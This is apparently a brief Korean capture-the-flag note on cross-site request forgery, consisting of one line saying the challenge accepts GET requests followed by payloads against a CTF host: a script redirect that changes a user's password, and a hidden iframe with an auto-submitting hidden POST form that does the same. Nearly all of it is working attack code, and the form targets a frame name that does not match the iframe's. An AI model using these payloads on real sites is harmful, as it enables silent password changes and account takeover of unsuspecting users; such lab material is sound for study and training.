해당 문제는 GET 방식으로 request를 받는다.
<script>location.href = "http://ctf.segfaulthub.com:7777/csrf_1/mypage_update.php?id=%ED%97%88%EB%8F%99%EC%9B%90&info=&pw=zxc123"</script>
<iframe width="0" height="0" border="0" name = "changeframe" id = "changeframe" style = "display: none;"></iframe>
<form method="POST" action="http://ctf.segfaulthub.com:7777/csrf_2/mypage_update.php" target="stealthframe" referrerpolicy="no-referrer">
<input type="hidden" name="id" value="%ED%97%88%EB%8F%99%EC%9B%90">
<input type="hidden" name="info">
<input type="hidden" name="pw" value = "qwer1234">
</form>
<script>document.forms[0].submit();</script>